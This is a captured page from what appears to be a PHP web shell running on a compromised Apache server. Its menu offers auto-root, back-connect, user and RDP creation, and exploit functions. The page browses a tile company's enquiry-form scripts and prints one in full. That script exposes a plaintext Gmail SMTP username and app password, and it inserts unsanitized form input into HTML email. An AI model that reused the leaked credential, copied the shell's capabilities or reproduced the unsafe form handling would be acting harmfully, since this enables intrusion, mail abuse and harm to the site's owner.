Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
class
[ DIR ]
drwxr-xr-x
php-mailer
[ DIR ]
drwxr-xr-x
career-enquiry.php
4.31
KB
-rw-r--r--
contact-enquiry.php
4.22
KB
-rw-r--r--
dealer-enquiry.php
4.64
KB
-rw-r--r--
download-enquiry.php
4.24
KB
-rw-r--r--
export-inquiry.php
4.84
KB
-rw-r--r--
interior-architecture-enquiry....
4.88
KB
-rw-r--r--
manufacturer-inquiry.php
4.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dealer-enquiry.php
<?php //include('../admin/module/obops.php'); if (isset($_POST["submit"])) { $cname = $_POST['cname']; $country = $_POST['country']; $state = $_POST['state']; $city = $_POST['city']; $email = $_POST['email']; $phone = $_POST['phone']; $message = $_POST['message']; $date = date("y-m-d"); if (isset($_POST["hidden-input"]) && !empty($_POST["hidden-input"])) { echo "SPAM!!"; echo "<script>window.location='../index.php'</script>"; die(); } $subject = "Italica : Dealer Enquiry"; $msg = "<html> <body> <div> <table width='100%' cellspacing='0' cellpadding='0' border='0' style='font-family: arial; color:#222222; font-size:12px;background:#f5f5f5; padding:10px; border:1px solid #d5d5d5'> <tbody> <tr> <td></td> <td style='font-size:20px' rowspan='2'> Italica | Dealer Enquiry </td> </tr> <tr> <td></td> <td width='11' height='10'></td></tr> <tr> <td height='200'> </td> <td style='font-family: arial;font-size:12px; color:#8D0303; text-decoration:none;line-height:16px;'> <br> <table width='100%' cellspacing='5' cellpadding='10' border='1' style='border-collapse:collapse;font-family: arial; color:#222222; font-size:12px; border:1px solid #d5d5d5; background:#ffffff'> <tbody> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>Company Name :</strong></td><td width='60%' style='text-indent:10px;'>" . $cname . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>Country :</strong></td><td width='60%' style='text-indent:10px;'>" . $country . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>State :</strong></td><td width='60%' style='text-indent:10px;'>" . $state . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>City :</strong></td><td width='60%' style='text-indent:10px;'>" . $city . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>Email ID :</strong></td><td width='60%' style='text-indent:10px;'>" . $email . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>Phone No :</strong></td><td width='60%' style='text-indent:10px;'>" . $phone . "</td> </tr> <tr> <td width='10%' style='text-indent:10px; background:#bcbcbc; text-align:right'><strong>Message :</strong></td><td width='60%' style='text-indent:10px;'>" . $message . "</td> </tr> </tbody> </table> </td> </tr> </tbody> </table> </div> </body> </html>"; require_once('php-mailer/class.phpmailer.php'); require_once('php-mailer/class.smtp.php'); $mail = new PHPMailer; //Enable SMTP debugging. $mail->SMTPDebug = 0; // debugging: 1 = errors and messages, 2 = messages only $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = 'smtp.gmail.com'; // Specify main and backup server $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = 'noreplyitalica@gmail.com'; // SMTP username $mail->Password = 'kbssgnepeambvvtu'; // SMTP password $mail->SMTPSecure = 'ssl'; // Enable encryption, 'tls' also accepted $mail->Port = 465; //465; //Set the SMTP port number - 587 for authenticated TLS $mail->setFrom('digitalitalica@gmail.com', 'Italica Tiles'); //Set who the message is to be sent from $mail->addReplyTo($email); //Set an alternative reply-to address $mail->addAddress('digitalitalica@gmail.com'); // Add a recipient $mail->WordWrap = 50; // Set word wrap to 50 characters $mail->isHTML(true); // Set email format to HTML $mail->Subject = $subject; $mail->Body = $msg; $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; if (!$mail->send()) { echo 'Message could not be sent.'; echo 'Mailer Error: ' . $mail->ErrorInfo; exit; } else { //$sql="INSERT INTO contact_enquiry(name, email, phone, sub, message, date)VALUES('$name', '$email', '$phone', '$sub', '$message', '$date')"; //if(mysqli_query($conn, $sql)) { echo "<script>window.location='../dealer.php?success'</script>"; } //else //{ // die("error in Query ".mysqli_error($conn)); //} } }
Close